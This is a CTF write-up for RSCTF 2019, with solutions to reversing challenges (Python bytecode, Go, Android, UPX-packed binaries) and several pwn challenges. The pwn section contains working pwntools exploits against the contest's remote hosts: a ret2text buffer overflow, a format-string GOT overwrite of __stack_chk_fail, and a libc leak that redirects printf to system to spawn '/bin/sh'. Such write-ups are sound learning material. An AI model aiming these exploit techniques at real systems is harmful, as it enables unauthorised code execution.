【WriteUp】RSCTF 2019 Solutions

Why was this year's Rongsi Cup so hard... I had planned to just sit back and watch the freshmen perform.

REVERSE

pyc

Description:

CrackMe


Solution:

My heart sank a bit when I saw this one; I had lost track of where I put my Python reversing tools.

But I found an online decompiler!!! –> https://tool.lu/pyc/

The recovered Python code (Python 2, so str is bytes and ord()/chr() work directly on the input):

import base64

def encode(str):
    s = ''
    for i in str:
        x = ord(i) ^ 32      # XOR each byte with 0x20 ...
        x = x + 16           # ... then add 16
        s += chr(x)

    return base64.b64encode(s)

correct = 'KVEkKFRUUVQiJiUmIyglVlNVJShRViQnUSBVViUmU1Y='
flag = ''
flag = raw_input('Input flag:')
if encode(flag) == correct:
    print 'yes'
else:
    print 'no'

Then just undo the code step by step: base64-decode, subtract 16, then XOR with 32 (the reverse order of the two byte operations).

Exploit script:

# Python 2: undo the base64, then the two byte operations in reverse order
import base64
correct = 'KVEkKFRUUVQiJiUmIyglVlNVJShRViQnUSBVViUmU1Y='
flag = base64.b64decode(correct)
flag = list(flag)
for i in range(len(flag)):
    flag[i] = chr(ord(flag[i]) - 16)   # undo the + 16 first ...
    flag[i] = chr(ord(flag[i]) ^ 32)   # ... then undo the XOR
print 'flag{' + ''.join(flag) + '}'
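As an added example (not from the original write-up), the same solver in Python 3 with both directions kept, so the recovered flag is checked by re-encoding it instead of being trusted. Only the base64 constant comes from the decompiled crackme; the function names are mine.

```python
import base64

CORRECT = "KVEkKFRUUVQiJiUmIyglVlNVJShRViQnUSBVViUmU1Y="  # constant from the decompiled crackme


def encode(flag: bytes) -> str:
    """Re-implementation of the crackme's encode(): (c ^ 32) + 16 per byte, then base64.
    bytes() raises ValueError if a byte leaves 0..255, just as Python 2's chr() would."""
    transformed = bytes((c ^ 32) + 16 for c in flag)
    return base64.b64encode(transformed).decode("ascii")


def decode(correct: str) -> bytes:
    """Invert encode(): base64-decode, subtract 16, then XOR 32 (operations reversed)."""
    raw = base64.b64decode(correct)
    return bytes(((c - 16) & 0xFF) ^ 32 for c in raw)


def solve(correct: str = CORRECT) -> str:
    flag = decode(correct)
    # Round-trip check: if the operation order were wrong this would not match
    if encode(flag) != correct:
        raise ValueError("round trip failed: decode() does not invert encode()")
    return "flag{" + flag.decode("ascii") + "}"


if __name__ == "__main__":
    print(solve())
```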

Flag:

flag{9a48ddad2656385fce58af47a0ef56cf}

Simple

Description:

CrackMe


Solution:

Key point:

__int64 sub_1400013A0()
{
  int v1; // [rsp+20h] [rbp-48h]
  __int128 v2; // [rsp+28h] [rbp-40h]
  __int128 v3; // [rsp+38h] [rbp-30h]
  char v4; // [rsp+48h] [rbp-20h]

  v4 = 0;
  v2 = xmmword_140006BB0;
  v3 = xmmword_140006BC0;
  sub_1400010D2((__int64)"Please input the number which you like:");
  sub_140001163("%d", &v1);
  if ( v1 == 233333 )
  {
    sub_1400010D2((__int64)"Yes, I like it too!!!\n");
    sub_1400010D2((__int64)"flag{%s}");
  }
  else
  {
    sub_1400010D2((__int64)"OK,but I don't like that number");
  }
  return 0i64;
}

Nothing much to say: enter 233333, then set a breakpoint at the code corresponding to this line

sub_1400010D2((__int64)"flag{%s}");

and single-step until the flag appears (this is in IDA).

Another approach is to search for the string directly in x64dbg (you may need the Chinese string-search plugin); it pops out immediately.


Flag:

flag{9cb18aef59e8f00877229bc75491f175}

WF

Description:

CrackMe


Solution:

This one is basically a giveaway. The key function:

__int64 sub_1400030D0()
{
  __int64 v0; // rax
  HANDLE v1; // rbx
  __int64 v2; // rax
  signed __int64 v3; // rax
  __m128i v4; // xmm1
  __int64 v5; // rax
  int v7; // [rsp+40h] [rbp-48h]
  DWORD NumberOfBytesWritten; // [rsp+44h] [rbp-44h]
  __int128 Buffer; // [rsp+48h] [rbp-40h]
  __int128 v10; // [rsp+58h] [rbp-30h]
  char v11; // [rsp+68h] [rbp-20h]

  sub_1400010A5(std::cout, "Please tell me how much is 1 + 1:");
  std::basic_istream<char,std::char_traits<char>>::operator>>(std::cin, &v7);
  if ( v7 != 2 )
  {
    v0 = sub_1400010A5(std::cout, "no no no!!!");
    std::basic_ostream<char,std::char_traits<char>>::operator<<(v0, sub_14000106E);
    exit(0);
  }
  sub_1400010A5(std::cout, "yes,so easy!");
  v1 = CreateFileA("D:\\flag", 0xC0000000, 0, 0i64, 4u, 0x80u, 0i64);
  if ( v1 == (HANDLE)-1i64 )
  {
    v2 = sub_1400010A5(std::cout, &unk_140007DD0);
    std::basic_ostream<char,std::char_traits<char>>::operator<<(v2, sub_14000106E);
  }
  v11 = 0;
  v3 = 0i64;
  v10 = xmmword_140007BC0;
  NumberOfBytesWritten = 0;
  v4 = _mm_load_si128((const __m128i *)&xmmword_140007C10);
  Buffer = xmmword_140007BB0;
  do
  {
    _mm_storeu_si128(
      (__m128i *)((char *)&Buffer + v3),
      _mm_add_epi8(_mm_loadu_si128((const __m128i *)((char *)&Buffer + v3)), v4));
    v3 += 16i64;
  }
  while ( v3 < 32 );
  WriteFile(v1, &Buffer, 0x20u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v1);
  DeleteFileA("D:\\flag");
  v5 = sub_1400010A5(std::cout, "HA,did you get the flag?");
  std::basic_ostream<char,std::char_traits<char>>::operator<<(v5, sub_14000106E);
  system("pause");
  return 0i64;
}

First enter 2.

You can see that the program creates a flag file and then deletes it again.

Set a breakpoint on the line just before DeleteFileA and you can read the flag straight from the file on the D: drive.

I did wonder what people without a D: drive are supposed to do. Reading the call, CreateFileA("D:\\flag", 0xC0000000, ...) asks for GENERIC_READ|GENERIC_WRITE with OPEN_ALWAYS (4); if it fails, the code only prints a message and carries on, so WriteFile receives INVALID_HANDLE_VALUE and nothing is written. Two alternatives: patch the path string in the binary, or reconstruct the 32 bytes statically: Buffer is xmmword_140007BB0 followed by xmmword_140007BC0, and the loop adds xmmword_140007C10 lane-wise to each 16-byte half with _mm_add_epi8 (sixteen independent 8-bit additions that wrap around).


Flag:

flag{866c37703f08cc4913e30314a8075467}

Simple2

Description:

CrackMe


Solution:

Searching the strings shows this binary is UPX-packed, so unpack it first:

upx -d simple2

Then load it in IDA; the key function is:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v6; // [rsp+0h] [rbp-70h]
  __int64 v7; // [rsp+8h] [rbp-68h]
  __int64 v8; // [rsp+10h] [rbp-60h]
  __int64 v9; // [rsp+18h] [rbp-58h]
  __int64 v10; // [rsp+20h] [rbp-50h]
  __int64 v11; // [rsp+28h] [rbp-48h]
  __int16 v12; // [rsp+30h] [rbp-40h]
  __int64 v13; // [rsp+40h] [rbp-30h]
  __int64 v14; // [rsp+48h] [rbp-28h]
  __int64 v15; // [rsp+50h] [rbp-20h]
  __int64 v16; // [rsp+58h] [rbp-18h]
  char v17; // [rsp+60h] [rbp-10h]
  int i; // [rsp+6Ch] [rbp-4h]

  v13 = '^.13]/.1';
  v14 = '.^3a^,^1';
  v15 = ',3-42/]`';
  v16 = '.+_1\\-43';
  v17 = 0;
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v9 = 0LL;
  v10 = 0LL;
  v11 = 0LL;
  v12 = 0;
  std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
  std::operator>><char,std::char_traits<char>>((std::istream *)&std::cin);
  for ( i = 0; i <= 31; ++i )
    *((_BYTE *)&v6 + i) -= 5;
  if ( (unsigned int)j_strcmp_ifunc(&v13, &v6) )
  {
    v4 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
    std::ostream::operator<<(v4, std::endl<char,std::char_traits<char>>);
  }
  else
  {
    v3 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
    std::ostream::operator<<(v3, std::endl<char,std::char_traits<char>>);
  }
  return 0;
}

So it's simple: the target string is at the top (v13..v16), the "encryption" is below (subtract 5 from each of the 32 input bytes, then strcmp against the constant), so just write it in reverse. Note that IDA prints each 8-byte constant as a character literal with the highest-address byte first, so the string as it sits in memory is each literal reversed.

One thing I hit along the way: the backslash gets escaped. After some fiddling, removing one backslash fixed it (in the IDA literal '.+_1\\-43' the '\\' is a single backslash; in Python either write '\\' or use a raw string).

I grabbed the string with gdb, breaking at:

.text:00000000004049FB                 test    eax, eax

After that it's just the script.

Exploit script:

# Python 2; raw string so the single backslash in the constant survives
str_enc = r"1./]31.^1^,^a3^.`]/24-3,34-\1_+."
str_enc = list(str_enc)
for i in range(0, 32):
    str_enc[i] = chr(ord(str_enc[i]) + 5)   # the binary subtracts 5 from each input byte
print 'flag{' + ''.join(str_enc) + '}'
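Both Simple2 and WF above are the same pattern: a string assembled from stack constants plus a byte-wise arithmetic step. As an added example (not part of the original write-up), this Python 3 snippet recovers the Simple2 string directly from the IDA literals, without a debugger, and emulates WF's _mm_add_epi8 loop so the file on D: is never needed. The Simple2 constants are the ones in the pseudocode; WF's real xmmword_140007BB0/BC0/C10 values are not on this page, so wf_demo() uses constructed stand-ins (an assumption, labelled in the code).

```python
# Constants copied from the Simple2 pseudocode (v13..v16).  IDA prints a QWORD
# as a character literal with the highest-address byte first, so the in-memory
# string is each literal reversed.  '\\' is one backslash.
SIMPLE2_QWORDS = ['^.13]/.1', '.^3a^,^1', ',3-42/]`', '.+_1\\-43']


def ida_char_literals_to_bytes(literals):
    """Join IDA multi-character integer literals in memory (little-endian) order."""
    return b"".join(lit.encode("latin-1")[::-1] for lit in literals)


def simple2_flag(literals=SIMPLE2_QWORDS):
    """main() subtracts 5 from every input byte and strcmp()s the result against
    the constant, so the accepted input is the constant with 5 added back."""
    stored = ida_char_literals_to_bytes(literals)
    return "flag{" + bytes((b + 5) & 0xFF for b in stored).decode("ascii") + "}"


def paddb(block, delta):
    """Emulate _mm_add_epi8 / paddb: 16 independent 8-bit lanes, each wrapping mod 256."""
    assert len(block) == 16 and len(delta) == 16
    return bytes((a + d) & 0xFF for a, d in zip(block, delta))


def wf_recover(buffer32, delta16):
    """Replay WF's loop: Buffer||v10 (32 bytes) processed as two 16-byte blocks,
    each added lane-wise with the same xmmword_140007C10 vector, then written
    to D:\\flag and deleted.  Reproducing it here needs no D: drive."""
    assert len(buffer32) == 32
    return b"".join(paddb(buffer32[i:i + 16], delta16) for i in (0, 16))


def wf_demo():
    """The real xmmword_140007BB0/BC0/C10 values are not on this page, so this uses
    CONSTRUCTED stand-ins (assumption): a delta vector chosen so that several lanes
    wrap past 0xFF, and a buffer derived so the replay yields the published flag body."""
    expected = b"866c37703f08cc4913e30314a8075467"
    delta = bytes(range(0xF0, 0x100))                      # assumed delta vector
    buffer32 = bytes((e - delta[i % 16]) & 0xFF for i, e in enumerate(expected))
    return wf_recover(buffer32, delta) == expected


if __name__ == "__main__":
    print(simple2_flag())
    print("WF replay with constructed constants:", wf_demo())
```

To use wf_recover() on the real binary, dump the three 16-byte constants from the .rdata addresses shown in the pseudocode and pass the first two concatenated as buffer32 and the third as delta16.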

Flag:

flag{634b863c6c1cf8c3eb479281892a6d03}

Mobile

Description:

CrackMe


Solution:

In the com.example.myapplication package you can find the flag-related logic.

The useful code:

MainActivity

String flag2 = flag.substring(0, flag.length() - 1);
if (Encryption.Encode(flag2, flag2.length()).equals("FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=")) {
    Toast.makeText(MainActivity.this, "Yes,this is your flag!", 0).show();
} else {
    Toast.makeText(MainActivity.this, "NO NO NO!!!!!!!!!!!!!!!", 0).show();
}

Encryption

package com.example.myapplication;

public class Encryption {
    public static String Encode(String str, int k) {
        String string = BuildConfig.FLAVOR;
        for (int i = 0; i < str.length(); i++) {
            char c = str.charAt(i);
            if (c >= 'a' && c <= 'z') {
                c = (char) ((k % 26) + c);
                if (c < 'a') {
                    c = (char) (c + 26);
                }
                if (c > 'z') {
                    c = (char) (c - 26);
                }
            } else if (c >= 'A' && c <= 'Z') {
                c = (char) ((k % 26) + c);
                if (c < 'A') {
                    c = (char) (c + 26);
                }
                if (c > 'Z') {
                    c = (char) (c - 26);
                }
            }
            StringBuilder stringBuilder = new StringBuilder();
            stringBuilder.append(string);
            stringBuilder.append(c);
            string = stringBuilder.toString();
        }
        return string;
    }
}

This is just a Caesar cipher on letters (digits and '=' are left alone). The shift is k = flag2.length(), and since a Caesar shift preserves length that is simply the length of the target string, 44, i.e. a shift of 44 mod 26 = 18.

I ran my old script that tries every shift from 0 to 127 and pasted its outputs into a list for a new script that base64-decodes each candidate and keeps the one that is pure alphanumerics.

Exploit script:

import base64
import re

list_enc = ['FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=',
'EUIzE2HqEKZnDaQcQatoEqt4EqMyEdEzEaV5QUPqFXP=',
'DTHyD2GpDJYmCzPbPzsnDps4DpLxDcDyDzU5PTOpEWO=',
'CSGxC2FoCIXlByOaOyrmCor4CoKwCbCxCyT5OSNoDVN=',
'BRFwB2EnBHWkAxNzNxqlBnq4BnJvBaBwBxS5NRMnCUM=',
'AQEvA2DmAGVjZwMyMwpkAmp4AmIuAzAvAwR5MQLmBTL=',
'ZPDuZ2ClZFUiYvLxLvojZlo4ZlHtZyZuZvQ5LPKlASK=',
'YOCtY2BkYEThXuKwKuniYkn4YkGsYxYtYuP5KOJkZRJ=',
'XNBsX2AjXDSgWtJvJtmhXjm4XjFrXwXsXtO5JNIjYQI=',
'WMArW2ZiWCRfVsIuIslgWil4WiEqWvWrWsN5IMHiXPH=',
'VLZqV2YhVBQeUrHtHrkfVhk4VhDpVuVqVrM5HLGhWOG=',
'UKYpU2XgUAPdTqGsGqjeUgj4UgCoUtUpUqL5GKFgVNF=',
'TJXoT2WfTZOcSpFrFpidTfi4TfBnTsToTpK5FJEfUME=',
'SIWnS2VeSYNbRoEqEohcSeh4SeAmSrSnSoJ5EIDeTLD=',
'RHVmR2UdRXMaQnDpDngbRdg4RdZlRqRmRnI5DHCdSKC=',
'QGUlQ2TcQWLzPmCoCmfaQcf4QcYkQpQlQmH5CGBcRJB=',
'PFTkP2SbPVKyOlBnBlezPbe4PbXjPoPkPlG5BFAbQIA=',
'OESjO2RaOUJxNkAmAkdyOad4OaWiOnOjOkF5AEZaPHZ=',
'NDRiN2QzNTIwMjZlZjcxNzc4NzVhNmNiNjE5ZDYzOGY=',
'MCQhM2PyMSHvLiYkYibwMyb4MyUgMlMhMiD5YCXyNFX=',
'LBPgL2OxLRGuKhXjXhavLxa4LxTfLkLgLhC5XBWxMEW=',
'KAOfK2NwKQFtJgWiWgzuKwz4KwSeKjKfKgB5WAVwLDV=',
'JZNeJ2MvJPEsIfVhVfytJvy4JvRdJiJeJfA5VZUvKCU=',
'IYMdI2LuIODrHeUgUexsIux4IuQcIhIdIeZ5UYTuJBT=',
'HXLcH2KtHNCqGdTfTdwrHtw4HtPbHgHcHdY5TXStIAS=',
'GWKbG2JsGMBpFcSeScvqGsv4GsOaGfGbGcX5SWRsHZR=',
'FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=',
'GWKbG2JsGMBpFcSeScvqGsv4GsOaGfGbGcX5SWRsHZR=',
'HXLcH2KtHNCqGdTfTdwrHtw4HtPbHgHcHdY5TXStIAS=',
'IYMdI2LuIODrHeUgUexsIux4IuQcIhIdIeZ5UYTuJBT=',
'JZNeJ2MvJPEsIfVhVfytJvy4JvRdJiJeJfA5VZUvKCU=',
'KAOfK2NwKQFtJgWiWgzuKwz4KwSeKjKfKgB5WAVwLDV=',
'LBPgL2OxLRGuKhXjXhavLxa4LxTfLkLgLhC5XBWxMEW=',
'MCQhM2PyMSHvLiYkYibwMyb4MyUgMlMhMiD5YCXyNFX=',
'NDRiN2QzNTIwMjZlZjcxNzc4NzVhNmNiNjE5ZDYzOGY=',
'OESjO2RaOUJxNkAmAkdyOad4OaWiOnOjOkF5AEZaPHZ=',
'PFTkP2SbPVKyOlBnBlezPbe4PbXjPoPkPlG5BFAbQIA=',
'QGUlQ2TcQWLzPmCoCmfaQcf4QcYkQpQlQmH5CGBcRJB=',
'RHVmR2UdRXMaQnDpDngbRdg4RdZlRqRmRnI5DHCdSKC=',
'SIWnS2VeSYNbRoEqEohcSeh4SeAmSrSnSoJ5EIDeTLD=',
'TJXoT2WfTZOcSpFrFpidTfi4TfBnTsToTpK5FJEfUME=',
'UKYpU2XgUAPdTqGsGqjeUgj4UgCoUtUpUqL5GKFgVNF=',
'VLZqV2YhVBQeUrHtHrkfVhk4VhDpVuVqVrM5HLGhWOG=',
'WMArW2ZiWCRfVsIuIslgWil4WiEqWvWrWsN5IMHiXPH=',
'XNBsX2AjXDSgWtJvJtmhXjm4XjFrXwXsXtO5JNIjYQI=',
'YOCtY2BkYEThXuKwKuniYkn4YkGsYxYtYuP5KOJkZRJ=',
'ZPDuZ2ClZFUiYvLxLvojZlo4ZlHtZyZuZvQ5LPKlASK=',
'AQEvA2DmAGVjZwMyMwpkAmp4AmIuAzAvAwR5MQLmBTL=',
'BRFwB2EnBHWkAxNzNxqlBnq4BnJvBaBwBxS5NRMnCUM=',
'CSGxC2FoCIXlByOaOyrmCor4CoKwCbCxCyT5OSNoDVN=',
'DTHyD2GpDJYmCzPbPzsnDps4DpLxDcDyDzU5PTOpEWO=',
'EUIzE2HqEKZnDaQcQatoEqt4EqMyEdEzEaV5QUPqFXP=',
'FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=']

for i in range(0, len(list_enc)):
    try:
        res = base64.b64decode(list_enc[i])
        if not re.search('[^a-zA-Z0-9]', res):   # only the right shift decodes to clean hex
            print 'flag{' + res + '}'
    except:
        print '[-]There is something wrong'
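As an added example (mine, not the write-up's), a Python 3 port of Encryption.Encode() plus a decoder that derives the shift from the ciphertext length instead of brute-forcing 128 candidates; the only input is the target string from MainActivity. java_mod() reproduces Java's truncating % so the port stays faithful for negative shifts as well.

```python
import base64

TARGET = "FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ="  # from MainActivity


def java_mod(a, b):
    """Java's % truncates toward zero; Python's floors.  Only differs for negative a."""
    r = abs(a) % abs(b)
    return -r if a < 0 else r


def encode(s, k):
    """Port of Encryption.Encode(): shift letters by k % 26 within their case,
    leave every other character untouched."""
    out = []
    for ch in s:
        c = ord(ch)
        for lo, hi in ((ord("a"), ord("z")), (ord("A"), ord("Z"))):
            if lo <= c <= hi:
                c += java_mod(k, 26)
                if c < lo:
                    c += 26
                if c > hi:
                    c -= 26
                break
        out.append(chr(c))
    return "".join(out)


def decode(ciphertext):
    """The app calls Encode(flag2, flag2.length()); a Caesar shift keeps the length,
    so k == len(ciphertext) and decoding is a shift by -k.  Verified by re-encoding."""
    k = len(ciphertext)
    plain = encode(ciphertext, -k)
    if encode(plain, k) != ciphertext:
        raise ValueError("decode() does not invert encode()")
    return plain


def solve(target=TARGET):
    typed = decode(target)                         # what the user had to type (flag2)
    return "flag{" + base64.b64decode(typed).decode("ascii") + "}"


if __name__ == "__main__":
    print(solve())
```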

Flag:

flag{44b7d352026ef7177875a6cb619d638f}

gogogo

Description:

CrackMe


Solution:

A standard beginner reversing task: you need to flip the flag register twice. The funniest part was that the challenge author uploaded the wrong file at first...

First find main_main, since this is a Go binary.

The function:

__int64 __usercall main_main@<rax>(__int64 a1@<rbp>, __int64 a2@<rdi>, __int64 a3@<rsi>)
{
  __int64 v3; // rdx
  __int64 result; // rax
  __int64 v5; // rdx
  __int64 v6; // rdx
  __int64 v7; // r8
  __int64 v8; // r9
  _QWORD *v9; // [rsp+8h] [rbp-98h]
  __int128 v10; // [rsp+58h] [rbp-48h]
  __int128 v11; // [rsp+68h] [rbp-38h]
  __int128 v12; // [rsp+78h] [rbp-28h]
  __int128 v13; // [rsp+88h] [rbp-18h]
  __int64 v14; // [rsp+98h] [rbp-8h]

  if ( (unsigned __int64)&v12 + 8 <= *(_QWORD *)(*(_QWORD *)__readgsqword(0x28u) + 16LL) )
    runtime_morestack_noctxt(a2, a3);
  runtime_newobject(a2, a3);
  *(_QWORD *)&v13 = &unk_4B2640;
  *((_QWORD *)&v13 + 1) = &main_statictmp_0;
  fmt_Fprint(a2, a3, &v13, &unk_4B2640);
  *(_QWORD *)&v12 = &unk_4AF540;
  *((_QWORD *)&v12 + 1) = v9;
  fmt_Fscanf(a2, a3, &go_itab__os_File_io_Reader);
  if ( v9[1] == 11LL )                      // Go string header: v9[0] = data pointer, v9[1] = length
  {
    runtime_memequal(a2, a3, v3, *v9);      // second check: byte-compare of the content
    runtime_convTstring(a2, a3, v5);
    *(_QWORD *)&v11 = &unk_4B2640;
    *((_QWORD *)&v11 + 1) = 11LL;
    result = fmt_Fprintf(
               a2,
               a3,
               v6,
               (__int64)&go_itab__os_File_io_Writer,
               v7,
               v8,
               (__int64)&go_itab__os_File_io_Writer,
               os_Stdout,
               (__int64)"yse ,flag{%s}}\n\tsched={pc: but progSize nmidlelocked= on zero Value out of range procedure in t.npagesKey= to finalizer untyped args -thread limit\n1907348632812595367431640625CertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRegSetValueExWSetFilePointerTranslateNameWallocfreetracebad allocCountbad span statebad stack sizefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a directorylevel 2 haltedlevel 3 haltednil elem type!no module datano such deviceprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.Pointerwinapi error #work.full != 0 with GC prog\n476837158203125<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWImpersonateSelfOpenThreadTokenOther_LowercaseOther_UppercaseProcess32FirstWPsalter_PahlaviRegCreateKeyExWRegDeleteValueWUnmapViewOfFile]\n\tmorebuf={pc:advertise errorbad debugCallV1force gc (idle)key has expiredmalloc deadlockmissing mcache?ms: gomaxprocs=network is downno medium foundno such processrecovery failedruntime error: runtime: frame scan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges:\n untyped locals , not a function0123456789abcdef2384185791015625: value of type AddDllDirectory",
               13LL,
               (__int64)&v11,
               1LL,
               1LL);
  }
  else
  {
    *(_QWORD *)&v10 = &unk_4B2640;
    *((_QWORD *)&v10 + 1) = &main_statictmp_1;
    result = fmt_Fprintln((__int64)&v14, a2, a3, (__int64)&go_itab__os_File_io_Writer, os_Stdout);
  }
  return result;
}

You can see the if involves two checks: v9[1] == 11 is the length field of the Go string header, and runtime_memequal then compares the bytes themselves (the pseudocode folds its branch away). So flip ZF at both comparisons in the debugger and you're done. (Go strings are not NUL-terminated, which is why IDA renders the format string as one huge literal running into the neighbouring strings.)


Flag:

flag{34d1f91fb2e514b8576fab1a75a89a6b}

PWN

veryeasypwn

Description:


Solution:

A giveaway pwn, probably there to encourage people; just enter 233.

Honestly, the pwn challenges in this contest were far too introductory; a bit of reversing difficulty would have been nice, there wasn't even a ret2libc.


Flag:

Dynamic target machine (no fixed flag)

pwn-1

Description:


Solution:

A standard beginner pwn: ret2text.

gets() overflows the stack; overwrite the return address with 0x4005B6 (the code that prints the flag).

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="amd64", os="linux")
if debug == 1:
    p = process('./pwn3')
elif debug == 0:
    p = remote('117.139.247.14', 9636)

pd = 'a' * 0x28                     # buffer + saved rbp
pd += p64(0x00000000004005B6)       # return address -> flag-printing code (ret2text)
p.sendline(pd)
p.interactive()

Flag:

Dynamic target machine (no fixed flag)

pwn-2

Description:


Solution:

I hadn't really studied format strings yet on my learning path, since few contests set them and they rarely show up in practice.

And then they set one. Two, in fact!

This is the fourth pwn challenge; I ordered them by how they were listed at the end...

This one is fairly novel, few people set it: the bug is a format string vulnerability.

The technique is to hijack the GOT entry of __stack_chk_fail and point it at the backdoor function. __stack_chk_fail is only called when the canary check fails, so the canary has to be clobbered on the way out; with the GOT entry hijacked, the failing check then calls the backdoor instead of aborting. Only the two low bytes of the entry need changing: the upper half (0x0804) already matches, since the unresolved GOT entry points back into the PLT of this non-PIE binary.

A really well-made challenge: there is a canary, and fmtstr_payload can't be used because its output would be too long for the input buffer, so the two %hhn writes are laid out by hand.

Playing Rongsi Cup, learning format strings from scratch...

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./pwn4')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9217)
    # libc = ELF('./', checksec=False)
elf = ELF('./pwn4', checksec=False)
# gdb.attach(p, "b *0x0804857E\nc\nsi")
# gdb.attach(p, "b *0x080485A6\nc")
got___stack_chk_fail = elf.got['__stack_chk_fail']
addr_fun_sys = 0x080484FB                     # backdoor function

# The buffer starts 2 bytes into printf's 4th argument slot, so 'aa' pads it out and the
# two addresses land exactly in slots 5 and 6.  Comments track the bytes printed so far,
# which is the value %hhn writes (mod 256).
pd = 'aa'                                     # slot 4; printed = 2
pd += p32(got___stack_chk_fail + 0)           # slot 5; printed = 6
pd += p32(got___stack_chk_fail + 1)           # slot 6; printed = 10
pd += '%' + str(0xfb - 10) + 'd%5$hhn'        # printed = 0xfb  -> low by
te 0xfb
pd += '%' + str(0x89) + 'd%6$hhn'             # printed = 0x184 -> next byte 0x84
print pd
success('got___stack_chk_fail = ' + hex(got___stack_chk_fail))
p.send(pd)
p.interactive()
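The padding values 0xfb-10 and 0x89 above come from one piece of arithmetic: each pad is (wanted byte minus bytes already printed) mod 256. As an added example (mine, not the write-up's), this Python 3 snippet builds such a compact %hhn payload for any target/value and runs it through a tiny printf model to confirm which bytes would land where. The backdoor address is the page's; GOT_STACK_CHK_FAIL is an assumed placeholder, in practice read it with elf.got['__stack_chk_fail']. It uses %c instead of the write-up's %d so the pad is exact no matter how many digits the consumed argument has.

```python
import re
import struct

BACKDOOR = 0x080484FB             # backdoor function address from the write-up
GOT_STACK_CHK_FAIL = 0x0804A01C   # ASSUMED placeholder; use elf.got['__stack_chk_fail']


def p32(x):
    return struct.pack("<I", x)


def build_hhn_payload(first_idx, target, value, nbytes, prefix=b"aa"):
    """Compact %hhn write: the addresses first, then one '%<pad>c%<idx>$hhn' per byte.
    Each pad is chosen mod 256 relative to what has already been printed, so bytes can
    be written in any order without the monotonic-count constraint of a single %n.
    Returns (payload, {arg_index: address}) so the payload can be simulated."""
    addrs = [target + i for i in range(nbytes)]
    payload = prefix + b"".join(p32(a) for a in addrs)
    printed = len(payload)                     # everything before the first % is echoed
    for i, addr in enumerate(addrs):
        want = (value >> (8 * i)) & 0xFF
        pad = (want - printed) % 256
        if pad:                                # '%0c' would still print one char: skip it
            payload += b"%%%dc" % pad
            printed += pad
        payload += b"%%%d$hhn" % (first_idx + i)
    return payload, {first_idx + i: a for i, a in enumerate(addrs)}


def simulate_printf(payload, argmap):
    """Minimal printf model: handles %<w>c, %<w>d (assuming a one-digit argument) and
    %<k>$hhn; returns {address: byte} for every write the format would perform."""
    mem = {}
    printed = pos = 0
    for m in re.finditer(rb"%(\d*)([cd])|%(\d+)\$hhn", payload):
        printed += m.start() - pos             # literal bytes between conversions
        pos = m.end()
        if m.group(3):
            mem[argmap[int(m.group(3))]] = printed & 0xFF
        else:
            printed += max(int(m.group(1) or 0), 1)
    return mem


def exploit_payload():
    """Rewrite the two low bytes of GOT[__stack_chk_fail] with the backdoor's."""
    pd, args = build_hhn_payload(5, GOT_STACK_CHK_FAIL, BACKDOOR, 2)
    return pd, simulate_printf(pd, args)


if __name__ == "__main__":
    pd, mem = exploit_payload()
    print(pd)
    print({hex(a): hex(b) for a, b in mem.items()})
```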

Flag:

Dynamic target machine (no fixed flag)

Entry level pwn

Description:


Solution:

This one is easy: leak a libc address through the format string, then use pwntools' fmtstr_payload to overwrite GOT[printf] with system, so the next printf(buf) becomes system(buf).

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./format')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9309)
elf = ELF('./format', checksec=False)
# gdb.attach(p, "b *0x08048589\nc\nsi")
got_printf = elf.got['printf']

p.recvuntil('TERM environment variable not set.\n')
# The libc version was identified from the low 12 bits of the leaked printf and setbuf
# GOT entries (printf ends in 0x020, setbuf in 0x450): libc6-i386_2.23-0ubuntu10_amd64
pd = p32(elf.got['printf']) + "%7$s"          # our buffer is printf's 7th argument: leak GOT[printf]
p.sendline(pd)
p.recv(4)                                     # the 4 address bytes are echoed back first
addr_printf = u32(p.recv(4))
libcbase = addr_printf - 0x049020
addr_system = libcbase + 0x03a940
pd = fmtstr_payload(7, {got_printf: addr_system})   # GOT[printf] <- system
p.sendline(pd)
success('addr_printf = ' + hex(addr_printf))
success('addr_system = ' + hex(addr_system))
p.sendline("/bin/sh\x00")                     # printf("/bin/sh") is now system("/bin/sh")
p.interactive()

Flag:

Dynamic target machine (no fixed flag)

pwn-3

Description:

hint: fancy stack overflow


Solution:

They even released a hint...

This one can't be done with ret2libc: further on there is a spot that passes an argument through eax and hangs, so fall back to plain shellcode.

